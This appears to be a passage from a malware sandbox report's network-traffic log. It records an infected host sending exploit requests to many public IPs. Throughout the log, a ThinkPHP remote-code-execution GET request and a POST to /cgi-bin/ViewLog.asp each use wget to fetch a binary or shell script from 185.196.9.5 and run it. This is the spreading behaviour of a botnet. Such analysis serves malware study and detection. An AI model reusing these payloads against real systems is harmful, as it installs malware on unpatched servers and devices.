69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {

Session ID	Source IP	Source Port	Destination IP	Destination Port
962	192.168.2.15	54492	95.142.174.66	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.077568054 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:47.245243073 CET	181	IN	HTTP/1.0 400 Bad request cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
963	192.168.2.15	59928	95.101.19.19	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.096112967 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:47.282362938 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:47 GMT Date: Sun, 25 Feb 2024 18:04:47 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 32 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 37 26 23 34 36 3b 31 64 32 65 64 66 38 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b2757b5c.1708884287.1d2edf8b</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
964	192.168.2.15	58576	94.121.48.74	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.107788086 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
965	192.168.2.15	50452	95.100.148.67	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.110229969 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:47.310818911 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:04:47 GMT Date: Sun, 25 Feb 2024 18:04:47 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 35 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 37 26 23 34 36 3b 32 31 33 62 61 36 33 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.95a571d4.1708884287.213ba638</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
966	192.168.2.15	49824	95.77.29.149	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.123868942 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
967	192.168.2.15	50838	95.129.46.143	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.133647919 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:47.357479095 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:04:47 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
968	192.168.2.15	32866	112.152.20.78	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.210789919 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
969	192.168.2.15	54508	95.142.174.66	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:47.413054943 CET	181	IN	HTTP/1.0 400 Bad request cache-control: no-cache content-type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
970	192.168.2.15	6502	88.247.40.171	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:48.358151913 CET	33	IN	Data Raw: 28 52 65 66 2e 49 64 3a 20 3f 73 75 66 4b 36 73 57 57 32 35 46 34 43 73 37 43 45 57 34 4d 4d 3f 29 Data Ascii: (Ref.Id: ?sufK6sWW25F4Cs7CEW4MM?)

Session ID	Source IP	Source Port	Destination IP	Destination Port
971	192.168.2.15	50490	95.100.148.67	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:48.703136921 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:48.894671917 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:04:48 GMT Date: Sun, 25 Feb 2024 18:04:48 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 61 35 37 31 64 34 26 23 34 36 3b 31 37 30 38 38 38 34 32 38 38 26 23 34 36 3b 32 32 33 36 66 30 66 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5a571d4.1708884288.2236f0fa</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
972	192.168.2.15	57450	88.198.23.154	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:48.887856007 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:49.072176933 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Sun, 25 Feb 2024 18:04:48 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
973	192.168.2.15	46896	94.121.213.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:49.595112085 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
974	192.168.2.15	50290	94.121.204.16	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:49.828316927 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
975	192.168.2.15	47508	95.86.75.41	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:49.837132931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
976	192.168.2.15	43016	95.216.241.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.022917032 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:50.218033075 CET	659	IN	HTTP/1.1 401 Unauthorized Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: Accept, Accept-Encoding, Authorization, Cache-Control, Content-Type, Content-Length, Origin, X-Real-IP, X-CSRF-Token Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS Access-Control-Allow-Origin: http://95.216.241.234 Access-Control-Max-Age: 7200 Content-Type: application/json; charset=utf-8 Www-Authenticate: Bearer X-Request-Id: 8bfba743-ebb9-46a5-87fd-88af0923e9ed Date: Sun, 25 Feb 2024 18:04:50 GMT Content-Length: 77 Connection: close Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 54 68 65 20 72 65 71 75 69 72 65 64 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 68 65 61 64 73 20 77 65 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e 22 7d Data Ascii: {"error":"The required authorization heads were not present in the request."}

Session ID	Source IP	Source Port	Destination IP	Destination Port
977	192.168.2.15	32784	94.120.98.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.048578024 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
978	192.168.2.15	39100	94.122.75.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.060197115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
979	192.168.2.15	59394	31.136.6.56	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.563827991 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:53.733094931 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:59.877152920 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:11.908848047 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:37.764710903 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
980	192.168.2.15	47268	85.69.168.244	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.778847933 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
981	192.168.2.15	33736	94.120.1.255	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.822107077 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
982	192.168.2.15	49198	85.239.113.94	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:50.961534977 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
983	192.168.2.15	47258	31.136.150.172	8080

Timestamp	Bytes transferred	Direction	Data
